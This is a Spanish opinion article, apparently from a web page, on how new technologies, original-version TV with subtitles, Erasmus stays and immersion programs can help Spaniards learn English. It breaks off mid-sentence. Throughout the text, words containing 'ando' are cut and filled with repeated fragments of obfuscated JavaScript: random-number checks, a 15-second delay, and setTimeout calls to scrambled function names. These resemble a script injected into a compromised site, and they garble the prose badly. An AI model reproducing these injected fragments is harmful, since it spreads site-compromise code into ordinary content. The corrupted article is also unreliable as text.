LAS NUEVAS TECNOLOGÍAS Y EL APRENDIZAJE DE IDIOMAS

Autora: Cristina Pintor Portero

Que España sea un país a la cola en el aprendizaje de idiomas tiene los días contados. El Marco Común de Referencia y las infinitas posibilidades para aprender otras lenguas gracias a las nuevas tecnologías y el creciente interés por ellas en la época en la que vivimos, hará que esto cambie.

Para un adolescente, saber inglés puede resultar aburrido, difícil y poco llamativo, pero esto sólo pasa si nunca se ha tenido la oportunidad de utilizar estos conocimientos del idioma en otras situaciones más allá de los exámenes en el instituto. Está clarísimo que el inglés puede llegar a resultar una asignatura divertida si la traspasamos más allá de las aulas, ¿cómo?, muy fácil: estamos constantemente rodeados del mundo anglosajón y cada vez lo tenemos más fácil para involucrarnos en él. Todas las canciones que escuchamos constantemente en la radio nos las inventamos al estilo “a wichu wichu, wichu wa…” cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando podemos sencillamente buscar la letra en el maravilloso mundo de Internet y realmente saber lo que estamos diciendo, pero nos da igual porque, total, nadie la va a entender.

También tenemos un sistema de televisión digital en todas y cada una de las casas de nuestro país, con el cual podemos ver todo tipo de programas en televisión. Pero, aparte de proporcionarnos un infinito número de canales, también nos ofrece la posibilidad de ver los programas en versión original (con o sin subtítulos) y así poder aprender gracias a las series de televisión. Sin embargo, también nos da pereza leer cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando vemos la tele, ¿verdad?

Con esto último, no quiero decir que la traducción no sea buena, sino que no es conveniente para aprender inglés. Todavía recuerdo un episodio del Príncipe de Bel Air en el que Carlton hacía un comentario muy divertido sobre El Fary. Y, claro, es que ¿quién en Estados Unidos no ha oído hablar del Fary alguna vez en su vida? ¿No creéis que es poco creíble? A mí sí me lo parece.

Hace varios años, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando estaba disfrutandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando de mi experiencia Erasmus (otra de las muchas facilidades para aprender idiomas) conocí a varios chicos que procedían de países del este de Europa. Estos chicos sabían hablar inglés de una manera extraordinaria y yo pensé, “vaya, tienen que tener un sistema de educación increíble en esos países”. Cual no fue mi sorpresa cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando me dijeron que ellos nunca habían estudiado inglés, que no sabían lo que era un complemento directo o las funciones que puedan tener los adverbios en una oración, etc. Ellos eran capaces de comunicarse en inglés porque siempre, desde pequeños, habían visto la televisión en versión original con subtítulos.

Éstas, unidas a la infinidad de Escuelas Oficiales de Idiomas y academias particulares, nos ofrecen todas las facilidades necesarias para aprender inglés u otros idiomas (aunque está claro que el inglés es el más demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andado. Sin embargo seguimos haciendo oídos sordos y seguimos siendo el país de Europa con peor nivel de inglés. Sólo el 25% de los españoles dice hablar inglés, aunque reconocen que es fundamental.

Además de esto, también existen programas de inmersión lingüística de los que puede disfrutar cualquier joven español. Miles de chicos y chicas de ESO o Bachillerato pasan el verano de sus vidas experiment